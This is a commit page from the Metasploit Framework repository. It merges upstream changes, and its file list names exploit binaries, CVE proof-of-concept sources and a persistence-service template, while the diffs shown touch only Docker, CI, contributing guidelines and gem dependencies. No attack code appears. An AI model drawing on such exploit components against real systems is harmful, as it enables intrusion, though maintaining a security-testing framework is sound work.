Browse Source

Merge remote-tracking branch 'upstream/master' into land-10812-

Brent Cook 9 months ago
parent
commit
5fc7167beb
100 changed files with 8457 additions and 910 deletions
  1. 2
    0
      .dockerignore
  2. 2
    0
      .github/PULL_REQUEST_TEMPLATE.md
  3. 0
    1
      .mailmap
  4. 1
    1
      .ruby-version
  5. 7
    5
      .travis.yml
  6. 1
    1
      CODE_OF_CONDUCT.md
  7. 44
    70
      CONTRIBUTING.md
  8. 15
    10
      Dockerfile
  9. 2
    0
      Gemfile
  10. 67
    56
      Gemfile.lock
  11. 1
    5
      LICENSE
  12. 74
    73
      LICENSE_GEMS
  13. 1
    1
      config/database.yml.travis
  14. 0
    11
      data/cpuinfo/build.sh
  15. 0
    64
      data/cpuinfo/cpuinfo.c
  16. BIN
      data/cpuinfo/cpuinfo.exe
  17. BIN
      data/cpuinfo/cpuinfo.ia32.bin
  18. BIN
      data/cpuinfo/cpuinfo.ia64.bin
  19. BIN
      data/exploits/CVE-2012-6636/armeabi/libndkstager.so
  20. BIN
      data/exploits/CVE-2012-6636/mips/libndkstager.so
  21. BIN
      data/exploits/CVE-2012-6636/x86/libndkstager.so
  22. BIN
      data/exploits/CVE-2016-4557/suidhelper
  23. BIN
      data/exploits/CVE-2018-0824/UnmarshalPwn.exe
  24. 16
    0
      data/exploits/CVE-2018-0824/script_template
  25. 182
    0
      data/exploits/CVE-2018-4233/int64.js
  26. BIN
      data/exploits/CVE-2018-4233/stage1.bin
  27. 78
    0
      data/exploits/CVE-2018-4233/utils.js
  28. BIN
      data/exploits/CVE-2018-4237/ssudo
  29. BIN
      data/exploits/CVE-2018-4404/stage2.dylib
  30. BIN
      data/exploits/CVE-2018-8120/CVE-2018-8120x64.exe
  31. BIN
      data/exploits/CVE-2018-8120/CVE-2018-8120x86.exe
  32. 52
    0
      data/exploits/cve-2018-18955/subshell.c
  33. BIN
      data/exploits/cve-2018-18955/subshell.out
  34. 272
    0
      data/exploits/cve-2018-18955/subuid_shell.c
  35. BIN
      data/exploits/cve-2018-18955/subuid_shell.out
  36. 2
    1
      data/exploits/evasion_shellcode.js
  37. 2
    1
      data/exploits/hta_evasion.hta
  38. BIN
      data/exploits/juicypotato/juicypotato.x64.dll
  39. BIN
      data/exploits/juicypotato/juicypotato.x86.dll
  40. 304
    0
      data/exploits/persistence_service/service.erb
  41. 13
    0
      data/headers/windows/Windows.h
  42. 2
    0
      data/headers/windows/stdlib.h
  43. 1
    1
      data/logos/metasploit-v5.txt
  44. BIN
      data/meterpreter/x64_osx_stage
  45. 919
    2
      data/wordlists/joomla.txt
  46. 1
    0
      data/wordlists/unix_users.txt
  47. 1
    0
      data/ysoserial_payloads.json
  48. 3583
    483
      db/modules_metadata_base.json
  49. 1
    1
      docker-compose.override.yml
  50. 1
    2
      docker-compose.yml
  51. 5
    0
      docker/database.yml
  52. 22
    11
      docker/entrypoint.sh
  53. 9
    14
      documentation/api/v1/auth_api_doc.rb
  54. 17
    1
      documentation/api/v1/credential_api_doc.rb
  55. 104
    1
      documentation/api/v1/event_api_doc.rb
  56. 1
    1
      documentation/api/v1/host_api_doc.rb
  57. 2
    2
      documentation/api/v1/login_api_doc.rb
  58. 17
    6
      documentation/api/v1/loot_api_doc.rb
  59. 1
    1
      documentation/api/v1/note_api_doc.rb
  60. 9
    0
      documentation/api/v1/root_api_doc.rb
  61. 1
    1
      documentation/api/v1/service_api_doc.rb
  62. 1
    1
      documentation/api/v1/session_api_doc.rb
  63. 33
    4
      documentation/api/v1/session_event_api_doc.rb
  64. 2
    30
      documentation/api/v1/vuln_api_doc.rb
  65. 1
    1
      documentation/api/v1/workspace_api_doc.rb
  66. 48
    0
      documentation/modules/auxiliary/admin/http/wp_gdpr_compliance_privesc.md
  67. 28
    0
      documentation/modules/auxiliary/admin/oracle/oracle_index_privesc.md
  68. 47
    0
      documentation/modules/auxiliary/admin/smb/webexec_command.md
  69. 36
    0
      documentation/modules/auxiliary/dos/scada/allen_bradley_pccc.md
  70. 76
    0
      documentation/modules/auxiliary/gather/c2s_dvr_password_disclosure.md
  71. 124
    0
      documentation/modules/auxiliary/gather/cisco_rv320_config.md
  72. 77
    0
      documentation/modules/auxiliary/gather/office365userenum.md
  73. 70
    47
      documentation/modules/auxiliary/scanner/couchdb/couchdb_enum.md
  74. 47
    0
      documentation/modules/auxiliary/scanner/http/cisco_device_manager.md
  75. 63
    0
      documentation/modules/auxiliary/scanner/http/iis_shortname_scanner.md
  76. 46
    0
      documentation/modules/auxiliary/scanner/http/influxdb_enum.md
  77. 48
    0
      documentation/modules/auxiliary/scanner/misc/ibm_mq_channel_brute.md
  78. 36
    0
      documentation/modules/auxiliary/scanner/misc/ibm_mq_enum.md
  79. 53
    0
      documentation/modules/auxiliary/scanner/misc/ibm_mq_login.md
  80. 59
    0
      documentation/modules/auxiliary/scanner/misc/java_jmx_scanner.md
  81. 21
    0
      documentation/modules/auxiliary/scanner/msmail/exchange_enum.md
  82. 42
    0
      documentation/modules/auxiliary/scanner/msmail/host_id.md
  83. 25
    0
      documentation/modules/auxiliary/scanner/msmail/onprem_enum.md
  84. 47
    0
      documentation/modules/auxiliary/scanner/sip/options_tcp.md
  85. 143
    0
      documentation/modules/auxiliary/scanner/snmp/cisco_config_tftp.md
  86. 49
    0
      documentation/modules/auxiliary/scanner/snmp/cisco_upload_file.md
  87. 39
    0
      documentation/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.md
  88. 167
    0
      documentation/modules/auxiliary/scanner/ssh/libssh_auth_bypass.md
  89. 21
    0
      documentation/modules/auxiliary/scanner/ubiquiti/ubiquiti_discover.md
  90. 170
    0
      documentation/modules/auxiliary/server/capture/ftp.md
  91. 271
    0
      documentation/modules/auxiliary/server/capture/http_basic.md
  92. 174
    0
      documentation/modules/auxiliary/server/capture/imap.md
  93. 72
    0
      documentation/modules/auxiliary/server/capture/mysql.md
  94. 43
    0
      documentation/modules/auxiliary/server/capture/postgresql.md
  95. 73
    0
      documentation/modules/auxiliary/server/capture/printjob_capture.md
  96. 57
    0
      documentation/modules/auxiliary/server/capture/telnet.md
  97. 69
    0
      documentation/modules/auxiliary/server/capture/vnc.md
  98. 78
    0
      documentation/modules/exploit/bsd/finger/morris_fingerd_bof.md
  99. 166
    0
      documentation/modules/exploit/linux/asan_suid_executable_priv_esc.md
  100. 0
    0
      documentation/modules/exploit/linux/http/cisco_firepower_useradd.md

+ 2
- 0
.dockerignore View File

@@ -5,6 +5,8 @@ docker-compose*.yml
5 5
 docker/
6 6
 !docker/msfconsole.rc
7 7
 !docker/entrypoint.sh
8
+!docker/database.yml
9
+Dockerfile
8 10
 README.md
9 11
 .git/
10 12
 .github/

+ 2
- 0
.github/PULL_REQUEST_TEMPLATE.md View File

@@ -2,6 +2,8 @@
2 2
 Tell us what this change does. If you're fixing a bug, please mention
3 3
 the github issue number.
4 4
 
5
+Please ensure you are submitting **from a unique branch** in your [repository](https://github.com/rapid7/metasploit-framework/pull/11086#issuecomment-445506416) to master in Rapid7's.
6
+
5 7
 ## Verification
6 8
 
7 9
 List the steps needed to make sure this thing works

+ 0
- 1
.mailmap View File

@@ -64,7 +64,6 @@ wwebb-r7 <wwebb-r7@github>           <William_Webb@rapid7.com>
64 64
 
65 65
 bannedit <bannedit@github>             David Rude <bannedit0@gmail.com>
66 66
 bcoles <bcoles@github>                 bcoles <bcoles@gmail.com>
67
-bcoles <bcoles@github>                 Brendan Coles <bcoles@gmail.com>
68 67
 bokojan <bokojan@github>               parzamendi-r7 <peter_arzamendi@rapid7.com>
69 68
 brandonprry <brandonprry@github>       <bperry@brandons-mbp.attlocal.net>
70 69
 brandonprry <brandonprry@github>       Brandon Perry <bperry@bperry-rapid7.(none)>

+ 1
- 1
.ruby-version View File

@@ -1 +1 @@
1
-2.5.1
1
+2.5.3

+ 7
- 5
.travis.yml View File

@@ -11,22 +11,23 @@ addons:
11 11
       - graphviz
12 12
 language: ruby
13 13
 rvm:
14
-  - '2.3.7'
15
-  - '2.4.4'
16
-  - '2.5.1'
14
+  - '2.3.8'
15
+  - '2.4.5'
16
+  - '2.5.3'
17 17
 
18 18
 env:
19 19
   - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'
20 20
   - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content"'
21 21
   # Used for testing the remote data service
22 22
   - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1'
23
+  - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content" REMOTE_DB=1'
23 24
 
24 25
 matrix:
25 26
   fast_finish: true
26 27
   exclude:
27
-  - rvm: '2.3.7'
28
+  - rvm: '2.3.8'
28 29
     env: CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1'
29
-  - rvm: '2.4.4'
30
+  - rvm: '2.4.5'
30 31
     env: CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1'
31 32
 
32 33
 jobs:
@@ -48,6 +49,7 @@ before_install:
48 49
   - ls -la ./.git/hooks
49 50
   - ./.git/hooks/post-merge
50 51
   # Update the bundler
52
+  - gem update --system
51 53
   - gem install bundler
52 54
 before_script:
53 55
   - cp config/database.yml.travis config/database.yml

+ 1
- 1
CODE_OF_CONDUCT.md View File

@@ -37,7 +37,7 @@ when an individual is representing the project or its community.
37 37
 Instances of abusive, harassing, or otherwise unacceptable behavior may be
38 38
 reported by contacting the project maintainers at msfdev@metasploit.com. If
39 39
 the incident involves a committer, you may report directly to
40
-egypt@metasploit.com or todb@metasploit.com.
40
+caitlin_condon@rapid7.com or todb@metasploit.com.
41 41
 
42 42
 All complaints will be reviewed and investigated and will result in a
43 43
 response that is deemed necessary and appropriate to the circumstances.

+ 44
- 70
CONTRIBUTING.md View File

@@ -1,82 +1,54 @@
1 1
 # Hello, World!
2 2
 
3 3
 Thanks for your interest in making Metasploit -- and therefore, the
4
-world -- a better place!
5
-
6
-Are you about to report a bug? Sorry to hear it. Here's our [Issue tracker].
7
-Please try to be as specific as you can about your problem; include steps
8
-to reproduce (cut and paste from your console output if it's helpful) and
9
-what you were expecting to happen.
10
-
11
-Are you about to report a security vulnerability in Metasploit itself?
12
-How ironic! Please take a look at Rapid7's [Vulnerability
13
-Disclosure Policy](https://www.rapid7.com/disclosure.jsp), and send
14
-your report to security@rapid7.com using our [PGP key].
15
-
16
-Are you about to contribute some new functionality, a bug fix, or a new
17
-Metasploit module? If so, read on...
4
+world -- a better place!  Before you get started, review our
5
+[Code of Conduct].  There are mutliple ways to help beyond just writing code:
6
+ - [Submit bugs and feature requests] with detailed information about your issue or idea.
7
+ - [Help fellow users with open issues] or [help fellow committers test recent pull requests].
8
+ - [Report a security vulnerability in Metasploit itself] to Rapid7.
9
+ - Submit an updated or brand new module!  We are always eager for exploits, scanners, and new
10
+   integrations or features. Don't know where to start? Set up a [development environment], then head over to ExploitDB to look for [proof-of-concept exploits] that might make a good module.
18 11
 
19 12
 # Contributing to Metasploit
20 13
 
21
-What you see here in CONTRIBUTING.md is a bullet point list of the do's
22
-and don'ts of how to make sure *your* valuable contributions actually
23
-make it into Metasploit's master branch.
24
-
25
-If you care not to follow these rules, your contribution **will** be
26
-closed. Sorry!
27
-
28
-This is intended to be a **short** list. The [wiki] is much more
29
-exhaustive and reveals many mysteries. If you read nothing else, take a
30
-look at the standard [development environment setup] guide
31
-and Metasploit's [Common Coding Mistakes].
14
+Here's a short list of do's and don'ts to make sure *your* valuable contributions actually make
15
+it into Metasploit's master branch.  If you do not care to follow these rules, your contribution
16
+**will** be closed. Sorry!
32 17
 
33 18
 ## Code Contributions
34 19
 
35
-* **Do** stick to the [Ruby style guide].
36
-* **Do** get [Rubocop] relatively quiet against the code you are adding or modifying.
20
+* **Do** stick to the [Ruby style guide] and use [Rubocop] to find common style issues.
37 21
 * **Do** follow the [50/72 rule] for Git commit messages.
38
-* **Don't** use the default merge messages when merging from other branches.
39 22
 * **Do** license your code as BSD 3-clause, BSD 2-clause, or MIT.
40
-* **Do** create a [topic branch] to work on instead of working directly on `master`.
41
- If you do not send a PR from a topic branch, the history of your PR will be
42
- lost as soon as you update your own master branch. See
43
- https://github.com/rapid7/metasploit-framework/pull/8000 for an example of
44
- this in action.
45
-
23
+* **Do** create a [topic branch] to work on instead of working directly on `master` to preserve the
24
+  history of your pull request.  See [PR#8000] for an example of losing commit history as soon as
25
+  you update your own master branch.
46 26
 
47 27
 ### Pull Requests
48 28
 
49
-* **Do** target your pull request to the **master branch**. Not staging, not develop, not release.
29
+* **Do** target your pull request to the **master branch**.
50 30
 * **Do** specify a descriptive title to make searching for your pull request easier.
51 31
 * **Do** include [console output], especially for witnessable effects in `msfconsole`.
52 32
 * **Do** list [verification steps] so your code is testable.
53 33
 * **Do** [reference associated issues] in your pull request description.
54
-* **Do** write [release notes] once a pull request is landed.
55 34
 * **Don't** leave your pull request description blank.
56 35
 * **Don't** abandon your pull request. Being responsive helps us land your code faster.
57 36
 
58
-Pull requests [PR#2940] and [PR#3043] are a couple good examples to follow.
37
+Pull request [PR#9966] is a good example to follow.
59 38
 
60 39
 #### New Modules
61 40
 
62
-* **Do** run `tools/dev/msftidy.rb` against your module and fix any errors or warnings that come up.
63
-  - It would be even better to set up `msftidy.rb` as a [pre-commit hook].
64
-* **Do** use the many module mixin [API]s. Wheel improvements are welcome; wheel reinventions, not so much.
41
+* **Do** set up `msftidy` to fix any errors or warnings that come up as a [pre-commit hook].
42
+* **Do** use the many module mixin [API]s.
65 43
 * **Don't** include more than one module per pull request.
66 44
 * **Do** include instructions on how to setup the vulnerable environment or software.
67
-* **Do** include [Module Documentation](https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation) showing sample run-throughs.
68
-
69
-
70
-
71
-#### Scripts
72
-
73
-* **Don't** submit new [scripts].  Scripts are shipped as examples for
74
-  automating local tasks, and anything "serious" can be done with post
75
-  modules and local exploits.
45
+* **Do** include [Module Documentation] showing sample run-throughs.
46
+* **Don't** submit new [scripts].  Scripts are shipped as examples for automating local tasks, and
47
+  anything "serious" can be done with post modules and local exploits.
76 48
 
77 49
 #### Library Code
78 50
 
79
-* **Do** write [RSpec] tests - even the smallest change in library land can thoroughly screw things up.
51
+* **Do** write [RSpec] tests - even the smallest change in a library can break existing code.
80 52
 * **Do** follow [Better Specs] - it's like the style guide for specs.
81 53
 * **Do** write [YARD] documentation - this makes it easier for people to use your code.
82 54
 * **Don't** fix a lot of things in one pull request. Small fixes are easier to validate.
@@ -84,44 +56,46 @@ Pull requests [PR#2940] and [PR#3043] are a couple good examples to follow.
84 56
 #### Bug Fixes
85 57
 
86 58
 * **Do** include reproduction steps in the form of verification steps.
87
-* **Do** include a link to any corresponding [Issues] in the format of
88
-  `See #1234` in your commit description.
59
+* **Do** link to any corresponding [Issues] in the format of `See #1234` in your commit description.
89 60
 
90 61
 ## Bug Reports
91 62
 
92
-* **Do** report vulnerabilities in Rapid7 software directly to security@rapid7.com.
63
+Please report vulnerabilities in Rapid7 software directly to security@rapid7.com. For more on our disclosure policy and Rapid7's approach to coordinated disclosure, [head over here](https://www.rapid7.com/security). 
64
+
65
+When reporting Metasploit issues:
93 66
 * **Do** write a detailed description of your bug and use a descriptive title.
94
-* **Do** include reproduction steps, stack traces, and anything else that might help us verify and fix your bug.
67
+* **Do** include reproduction steps, stack traces, and anything that might help us fix your bug.
95 68
 * **Don't** file duplicate reports; search for your bug before filing a new report.
96 69
 
97
-If you need some more guidance, talk to the main body of open
98
-source contributors over on the [Freenode IRC channel],
99
-or e-mail us at the [metasploit-hackers] mailing list.
70
+If you need some more guidance, talk to the main body of open source contributors over on our
71
+[Metasploit Slack] or [#metasploit on Freenode IRC].
100 72
 
101
-Also, **thank you** for taking the few moments to read this far! You're
102
-already way ahead of the curve, so keep it up!
73
+Finally, **thank you** for taking the few moments to read this far! You're already way ahead of the
74
+curve, so keep it up!
103 75
 
104
-[Issue Tracker]:http://r-7.co/MSF-BUGv1
105
-[PGP key]:http://pgp.mit.edu:11371/pks/lookup?op=vindex&search=0x2380F85B8AD4DB8D
106
-[wiki]:https://github.com/rapid7/metasploit-framework/wiki
107
-[scripts]:https://github.com/rapid7/metasploit-framework/tree/master/scripts
108
-[development environment setup]:http://r-7.co/MSF-DEV
109
-[Common Coding Mistakes]:https://github.com/rapid7/metasploit-framework/wiki/Common-Metasploit-Module-Coding-Mistakes
76
+[Code of Conduct]:https://github.com/rapid7/metasploit-framework/wiki/CODE_OF_CONDUCT.md
77
+[Submit bugs and feature requests]:http://r-7.co/MSF-BUGv1
78
+[Help fellow users with open issues]:https://github.com/rapid7/metasploit-framework/issues
79
+[help fellow committers test recently submitted pull requests]:https://github.com/rapid7/metasploit-framework/pulls
80
+[Report a security vulnerability in Metasploit itself]:https://www.rapid7.com/disclosure.jsp
81
+[development environment]:http://r-7.co/MSF-DEV
82
+[proof-of-concept exploits]:https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true
110 83
 [Ruby style guide]:https://github.com/bbatsov/ruby-style-guide
111 84
 [Rubocop]:https://rubygems.org/search?query=rubocop
112 85
 [50/72 rule]:http://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html
113 86
 [topic branch]:http://git-scm.com/book/en/Git-Branching-Branching-Workflows#Topic-Branches
87
+[PR#8000]:https://github.com/rapid7/metasploit-framework/pull/8000
114 88
 [console output]:https://help.github.com/articles/github-flavored-markdown#fenced-code-blocks
115 89
 [verification steps]:https://help.github.com/articles/writing-on-github#task-lists
116 90
 [reference associated issues]:https://github.com/blog/1506-closing-issues-via-pull-requests
117
-[release notes]:https://github.com/rapid7/metasploit-framework/wiki/Adding-Release-Notes-to-PRs
118
-[PR#2940]:https://github.com/rapid7/metasploit-framework/pull/2940
119
-[PR#3043]:https://github.com/rapid7/metasploit-framework/pull/3043
91
+[PR#9966]:https://github.com/rapid7/metasploit-framework/pull/9966
120 92
 [pre-commit hook]:https://github.com/rapid7/metasploit-framework/blob/master/tools/dev/pre-commit-hook.rb
121 93
 [API]:https://rapid7.github.io/metasploit-framework/api
94
+[Module Documentation]:https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation
95
+[scripts]:https://github.com/rapid7/metasploit-framework/tree/master/scripts
122 96
 [RSpec]:http://rspec.info
123 97
 [Better Specs]:http://betterspecs.org
124 98
 [YARD]:http://yardoc.org
125 99
 [Issues]:https://github.com/rapid7/metasploit-framework/issues
126
-[Freenode IRC channel]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
127
-[metasploit-hackers]:https://groups.google.com/forum/#!forum/metasploit-hackers
100
+[Metasploit Slack]:https://www.metasploit.com/slack
101
+[#metasploit on Freenode IRC]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4

+ 15
- 10
Dockerfile View File

@@ -1,12 +1,12 @@
1
-FROM ruby:2.5.1-alpine3.7 AS builder
1
+FROM ruby:2.5.3-alpine3.7 AS builder
2 2
 LABEL maintainer="Rapid7"
3 3
 
4 4
 ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
5
-ENV APP_HOME /usr/src/metasploit-framework/
5
+ENV APP_HOME=/usr/src/metasploit-framework
6 6
 ENV BUNDLE_IGNORE_MESSAGES="true"
7 7
 WORKDIR $APP_HOME
8 8
 
9
-COPY Gemfile* metasploit-framework.gemspec Rakefile $APP_HOME
9
+COPY Gemfile* metasploit-framework.gemspec Rakefile $APP_HOME/
10 10
 COPY lib/metasploit/framework/version.rb $APP_HOME/lib/metasploit/framework/version.rb
11 11
 COPY lib/metasploit/framework/rails_version_constraint.rb $APP_HOME/lib/metasploit/framework/rails_version_constraint.rb
12 12
 COPY lib/msf/util/helper.rb $APP_HOME/lib/msf/util/helper.rb
@@ -37,26 +37,31 @@ RUN apk add --no-cache \
37 37
     && chmod -R a+r /usr/local/bundle
38 38
 
39 39
 
40
-FROM ruby:2.5.1-alpine3.7
40
+FROM ruby:2.5.3-alpine3.7
41 41
 LABEL maintainer="Rapid7"
42 42
 
43
-ENV APP_HOME /usr/src/metasploit-framework/
43
+ENV APP_HOME=/usr/src/metasploit-framework
44 44
 ENV NMAP_PRIVILEGED=""
45
+ENV METASPLOIT_GROUP=metasploit
45 46
 
46
-COPY --from=builder /usr/local/bundle /usr/local/bundle
47
-COPY . $APP_HOME
47
+# used for the copy command
48
+RUN addgroup -S $METASPLOIT_GROUP
48 49
 
49 50
 RUN apk add --no-cache bash sqlite-libs nmap nmap-scripts nmap-nselibs postgresql-libs python python3 ncurses libcap su-exec
50 51
 
51 52
 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
52 53
 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which nmap)
53 54
 
55
+COPY --chown=root:metasploit --from=builder /usr/local/bundle /usr/local/bundle
56
+COPY --chown=root:metasploit . $APP_HOME/
57
+RUN cp -f $APP_HOME/docker/database.yml $APP_HOME/config/database.yml
58
+
54 59
 WORKDIR $APP_HOME
60
+
55 61
 # we need this entrypoint to dynamically create a user
56 62
 # matching the hosts UID and GID so we can mount something
57 63
 # from the users home directory. If the IDs don't match
58
-# it results in access denied errors. Once docker has
59
-# a solution for this we can revert it back to normal
64
+# it results in access denied errors.
60 65
 ENTRYPOINT ["docker/entrypoint.sh"]
61 66
 
62
-CMD ["./msfconsole", "-r", "docker/msfconsole.rc"]
67
+CMD ["./msfconsole", "-r", "docker/msfconsole.rc", "-y", "$APP_HOME/config/database.yml"]

+ 2
- 0
Gemfile View File

@@ -3,6 +3,8 @@ source 'https://rubygems.org'
3 3
 #   spec.add_runtime_dependency '<name>', [<version requirements>]
4 4
 gemspec name: 'metasploit-framework'
5 5
 
6
+gem 'sqlite3', '~>1.3.0'
7
+
6 8
 # separate from test as simplecov is not run on travis-ci
7 9
 group :coverage do
8 10
   # code coverage for tests

+ 67
- 56
Gemfile.lock View File

@@ -1,7 +1,7 @@
1 1
 PATH
2 2
   remote: .
3 3
   specs:
4
-    metasploit-framework (5.0.0)
4
+    metasploit-framework (5.0.5)
5 5
       actionpack (~> 4.2.6)
6 6
       activerecord (~> 4.2.6)
7 7
       activesupport (~> 4.2.6)
@@ -9,8 +9,10 @@ PATH
9 9
       bcrypt
10 10
       bcrypt_pbkdf
11 11
       bit-struct
12
+      concurrent-ruby (= 1.0.5)
12 13
       dnsruby
13 14
       ed25519
15
+      em-http-request
14 16
       faker
15 17
       filesize
16 18
       jsobfu
@@ -19,9 +21,9 @@ PATH
19 21
       metasploit-concern
20 22
       metasploit-credential
21 23
       metasploit-model
22
-      metasploit-payloads (= 1.3.52)
24
+      metasploit-payloads (= 1.3.61)
23 25
       metasploit_data_models
24
-      metasploit_payloads-mettle (= 0.4.2)
26
+      metasploit_payloads-mettle (= 0.5.6)
25 27
       mqtt
26 28
       msgpack
27 29
       nessus_rest
@@ -66,7 +68,6 @@ PATH
66 68
       sinatra
67 69
       sqlite3
68 70
       sshkey
69
-      sysrandom
70 71
       thin
71 72
       tzinfo
72 73
       tzinfo-data
@@ -79,27 +80,27 @@ GEM
79 80
   remote: https://rubygems.org/
80 81
   specs:
81 82
     Ascii85 (1.0.3)
82
-    actionpack (4.2.10)
83
-      actionview (= 4.2.10)
84
-      activesupport (= 4.2.10)
83
+    actionpack (4.2.11)
84
+      actionview (= 4.2.11)
85
+      activesupport (= 4.2.11)
85 86
       rack (~> 1.6)
86 87
       rack-test (~> 0.6.2)
87 88
       rails-dom-testing (~> 1.0, >= 1.0.5)
88 89
       rails-html-sanitizer (~> 1.0, >= 1.0.2)
89
-    actionview (4.2.10)
90
-      activesupport (= 4.2.10)
90
+    actionview (4.2.11)
91
+      activesupport (= 4.2.11)
91 92
       builder (~> 3.1)
92 93
       erubis (~> 2.7.0)
93 94
       rails-dom-testing (~> 1.0, >= 1.0.5)
94 95
       rails-html-sanitizer (~> 1.0, >= 1.0.3)
95
-    activemodel (4.2.10)
96
-      activesupport (= 4.2.10)
96
+    activemodel (4.2.11)
97
+      activesupport (= 4.2.11)
97 98
       builder (~> 3.1)
98
-    activerecord (4.2.10)
99
-      activemodel (= 4.2.10)
100
-      activesupport (= 4.2.10)
99
+    activerecord (4.2.11)
100
+      activemodel (= 4.2.11)
101
+      activesupport (= 4.2.11)
101 102
       arel (~> 6.0)
102
-    activesupport (4.2.10)
103
+    activesupport (4.2.11)
103 104
       i18n (~> 0.7)
104 105
       minitest (~> 5.1)
105 106
       thread_safe (~> 0.3, >= 0.3.4)
@@ -118,33 +119,43 @@ GEM
118 119
     builder (3.2.3)
119 120
     coderay (1.1.2)
120 121
     concurrent-ruby (1.0.5)
122
+    cookiejar (0.3.3)
121 123
     crass (1.0.4)
122
-    daemons (1.2.6)
124
+    daemons (1.3.1)
123 125
     diff-lcs (1.3)
124 126
     dnsruby (1.61.2)
125 127
       addressable (~> 2.5)
126 128
     docile (1.3.1)
127 129
     ed25519 (1.2.4)
130
+    em-http-request (1.1.5)
131
+      addressable (>= 2.3.4)
132
+      cookiejar (!= 0.3.1)
133
+      em-socksify (>= 0.3)
134
+      eventmachine (>= 1.0.3)
135
+      http_parser.rb (>= 0.6.0)
136
+    em-socksify (0.3.2)
137
+      eventmachine (>= 1.0.0.beta.4)
128 138
     erubis (2.7.0)
129 139
     eventmachine (1.2.7)
130
-    factory_bot (4.11.1)
131
-      activesupport (>= 3.0.0)
132
-    factory_bot_rails (4.11.1)
133
-      factory_bot (~> 4.11.1)
134
-      railties (>= 3.0.0)
140
+    factory_bot (5.0.0)
141
+      activesupport (>= 4.2.0)
142
+    factory_bot_rails (5.0.0)
143
+      factory_bot (~> 5.0.0)
144
+      railties (>= 4.2.0)
135 145
     faker (1.9.1)
136 146
       i18n (>= 0.7)
137
-    faraday (0.15.3)
147
+    faraday (0.15.4)
138 148
       multipart-post (>= 1.2, < 3)
139 149
     filesize (0.2.0)
140 150
     fivemat (1.3.7)
141 151
     hashery (2.1.2)
152
+    http_parser.rb (0.6.0)
142 153
     i18n (0.9.5)
143 154
       concurrent-ruby (~> 1.0)
144 155
     jsobfu (0.4.2)
145 156
       rkelly-remix
146 157
     json (2.1.0)
147
-    loofah (2.2.2)
158
+    loofah (2.2.3)
148 159
       crass (~> 1.0.2)
149 160
       nokogiri (>= 1.5.9)
150 161
     metasm (1.0.3)
@@ -152,12 +163,12 @@ GEM
152 163
       activemodel (~> 4.2.6)
153 164
       activesupport (~> 4.2.6)
154 165
       railties (~> 4.2.6)
155
-    metasploit-credential (3.0.1)
166
+    metasploit-credential (3.0.3)
156 167
       metasploit-concern
157 168
       metasploit-model
158 169
       metasploit_data_models (>= 3.0.0)
159 170
       net-ssh
160
-      pg (~> 0.15)
171
+      pg
161 172
       railties
162 173
       rex-socket
163 174
       rubyntlm
@@ -166,39 +177,39 @@ GEM
166 177
       activemodel (~> 4.2.6)
167 178
       activesupport (~> 4.2.6)
168 179
       railties (~> 4.2.6)
169
-    metasploit-payloads (1.3.52)
170
-    metasploit_data_models (3.0.1)
180
+    metasploit-payloads (1.3.61)
181
+    metasploit_data_models (3.0.5)
171 182
       activerecord (~> 4.2.6)
172 183
       activesupport (~> 4.2.6)
173 184
       arel-helpers
174 185
       metasploit-concern
175 186
       metasploit-model
176
-      pg (= 0.20.0)
187
+      pg
177 188
       postgres_ext
178 189
       railties (~> 4.2.6)
179 190
       recog (~> 2.0)
180
-    metasploit_payloads-mettle (0.4.2)
181
-    method_source (0.9.0)
182
-    mini_portile2 (2.3.0)
191
+    metasploit_payloads-mettle (0.5.6)
192
+    method_source (0.9.2)
193
+    mini_portile2 (2.4.0)
183 194
     minitest (5.11.3)
184 195
     mqtt (0.5.0)
185
-    msgpack (1.2.4)
196
+    msgpack (1.2.6)
186 197
     multipart-post (2.0.0)
187 198
     nessus_rest (0.1.6)
188
-    net-ssh (5.0.2)
199
+    net-ssh (5.1.0)
189 200
     network_interface (0.0.2)
190 201
     nexpose (7.2.1)
191
-    nokogiri (1.8.4)
192
-      mini_portile2 (~> 2.3.0)
193
-    octokit (4.12.0)
202
+    nokogiri (1.10.1)
203
+      mini_portile2 (~> 2.4.0)
204
+    octokit (4.13.0)
194 205
       sawyer (~> 0.8.0, >= 0.5.3)
195
-    openssl-ccm (1.2.1)
206
+    openssl-ccm (1.2.2)
196 207
     openvas-omp (0.0.4)
197 208
     packetfu (1.1.13)
198 209
       pcaprub
199 210
     patch_finder (1.0.2)
200 211
     pcaprub (0.13.0)
201
-    pdf-reader (2.1.0)
212
+    pdf-reader (2.2.0)
202 213
       Ascii85 (~> 1.0.0)
203 214
       afm (~> 0.2.1)
204 215
       hashery (~> 2.0)
@@ -210,11 +221,11 @@ GEM
210 221
       activerecord (~> 4.0)
211 222
       arel (>= 4.0.1)
212 223
       pg_array_parser (~> 0.0.9)
213
-    pry (0.11.3)
224
+    pry (0.12.2)
214 225
       coderay (~> 1.1.0)
215 226
       method_source (~> 0.9.0)
216 227
     public_suffix (3.0.3)
217
-    rack (1.6.10)
228
+    rack (1.6.11)
218 229
     rack-protection (1.5.5)
219 230
       rack
220 231
     rack-test (0.6.3)
@@ -227,19 +238,19 @@ GEM
227 238
       rails-deprecated_sanitizer (>= 1.0.1)
228 239
     rails-html-sanitizer (1.0.4)
229 240
       loofah (~> 2.2, >= 2.2.2)
230
-    railties (4.2.10)
231
-      actionpack (= 4.2.10)
232
-      activesupport (= 4.2.10)
241
+    railties (4.2.11)
242
+      actionpack (= 4.2.11)
243
+      activesupport (= 4.2.11)
233 244
       rake (>= 0.8.7)
234 245
       thor (>= 0.18.1, < 2.0)
235
-    rake (12.3.1)
246
+    rake (12.3.2)
236 247
     rb-readline (0.5.5)
237
-    recog (2.1.24)
